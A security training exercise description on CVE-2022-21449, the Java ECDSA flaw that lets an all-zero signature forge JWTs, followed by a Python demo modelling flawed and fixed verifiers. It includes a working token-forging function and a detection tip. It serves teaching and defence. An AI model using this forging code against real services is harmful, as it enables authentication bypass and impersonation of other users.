This exercise covers the exploitation of CVE-2022-21449 against a Java application that relies on JWT for authentication.

< 1 Hr.
Brown Badge


This course covers the exploitation of a Spring application that uses JSON Web Tokens (JWT) for authentication, leveraging a flaw in the Java implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) tracked as CVE-2022-21449. The flaw affects Java 15 through 18: the rewritten ECDSA verifier omitted the check that both signature components satisfy 0 < r < n and 0 < s < n, so a signature in which both 'r' and 's' are zero passes verification for any message and any public key. Because the bug sits in the JDK itself, any JWT library that delegates ES256/ES384/ES512 verification to the platform signature provider is affected regardless of which library the application uses. Since JWS encodes an ECDSA signature as the raw concatenation r || s, the forged signature is simply a run of zero bytes (64 bytes for ES256). The course includes detailed instructions on generating such a signature using JWT libraries in various programming languages and applying it to gain unauthorized access.

The practical challenge involves logging in to obtain a valid token, modifying the username claim to ",", and replacing the legitimate signature with the forged all-zero ECDSA signature. This hands-on approach demonstrates the severity of the vulnerability and equips learners with the skills to identify and exploit similar flaws in real-world applications. The course is inspired by the blog post "Psychic Signatures in Java" and aims to deepen understanding of cryptographic vulnerabilities in Java applications.
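The following is an added, self-contained example (not part of the PentesterLab exercise and not the Spring application's code) that shows both halves of the procedure above: why an r = s = 0 signature satisfies the verification equation when the range check is missing, and what the forged ES256 token looks like. It models the flawed verifier with a pure-Python P-256 implementation (slow but dependency-free) and places the fixed verifier beside it. The private key, nonce, token claims and the "victim" target claim are constructed for the demo and are assumptions, not values from the exercise.

```python
import base64
import hashlib
import json

# NIST P-256 (secp256r1) domain parameters, the curve behind JWS alg "ES256".
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
INF = None  # the point at infinity

def ec_add(p1, p2):
    """Affine point addition (doubling when p1 == p2)."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def ec_mul(k, pt):
    """Double-and-add scalar multiplication; k = 0 yields the point at infinity."""
    acc = INF
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc

def hash_to_int(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big")

def sign(d: int, msg: bytes, k: int):
    """Textbook ECDSA with a caller-supplied nonce; demo only, never reuse k."""
    z = hash_to_int(msg)
    r = ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (z + r * d) % N
    return r, s

def verify_without_range_check(q, msg: bytes, r: int, s: int) -> bool:
    """Models the flawed verifier: no '0 < r, s < N' check, and s^-1 is taken as
    s^(N-2) mod N, which silently maps s = 0 to w = 0. Then u1 = u2 = 0, the sum
    is the point at infinity, its x-coordinate is treated as 0, and 0 == r holds."""
    z = hash_to_int(msg)
    w = pow(s, N - 2, N)
    pt = ec_add(ec_mul(z * w % N, G), ec_mul(r * w % N, q))
    x = 0 if pt is INF else pt[0]
    return x % N == r

def verify_with_range_check(q, msg: bytes, r: int, s: int) -> bool:
    """The check the fix restored (and that the ECDSA specification always required)."""
    if not (0 < r < N and 0 < s < N):
        return False
    return verify_without_range_check(q, msg, r, s)

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def forge_jwt(token: str, claim_updates: dict) -> str:
    """Keep the header, rewrite payload claims, and replace the signature with the
    JWS form of r = s = 0: JWS stores raw r || s, so ES256 needs 64 zero bytes."""
    hdr, body, _old_sig = token.split(".")
    width = {"ES256": 32, "ES384": 48, "ES512": 66}[json.loads(b64url_decode(hdr))["alg"]]
    claims = json.loads(b64url_decode(body))
    claims.update(claim_updates)
    new_body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    zero_sig = b64url(b"\x00" * (2 * width))
    return f"{hdr}.{new_body}.{zero_sig}"

def check_jwt(q, token: str, verifier) -> bool:
    """Split an ES256 token and run the chosen verifier over header.payload."""
    hdr, body, sig = token.split(".")
    raw = b64url_decode(sig)
    r, s = int.from_bytes(raw[:32], "big"), int.from_bytes(raw[32:], "big")
    return verifier(q, f"{hdr}.{body}".encode(), r, s)

def demo() -> dict:
    # Constructed private key and nonce for the demo; not from any real system.
    d = 0xC9AFA9D845BA75166B5C215767B1D6934E50C3DB36E89B127B8A622B120F6721
    k = 0xA6E3C57DD01ABE90086538398355DD4C3B17AA873382B0F24D6129493D8AAD60
    q = ec_mul(d, G)
    hdr = b64url(b'{"alg":"ES256","typ":"JWT"}')
    body = b64url(b'{"sub":"alice","role":"user"}')  # constructed claims
    r, s = sign(d, f"{hdr}.{body}".encode(), k)
    genuine = f"{hdr}.{body}.{b64url(r.to_bytes(32, 'big') + s.to_bytes(32, 'big'))}"
    forged = forge_jwt(genuine, {"sub": "victim"})  # hypothetical target username
    return {
        "genuine_fixed": check_jwt(q, genuine, verify_with_range_check),
        "forged_vulnerable": check_jwt(q, forged, verify_without_range_check),
        "forged_fixed": check_jwt(q, forged, verify_with_range_check),
        "forged_signature_b64": forged.split(".")[2],
    }
```

The forged token's third segment is 86 base64url characters of "A", which is what a run of 64 zero bytes encodes to; seeing that pattern in a request log is a cheap detection for this attack. Note that the flaw lies in the verifier, so the forged token passes regardless of which key the server holds, and the only reliable fix is a patched JDK (or a verifier that enforces the range check itself), not a key rotation.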
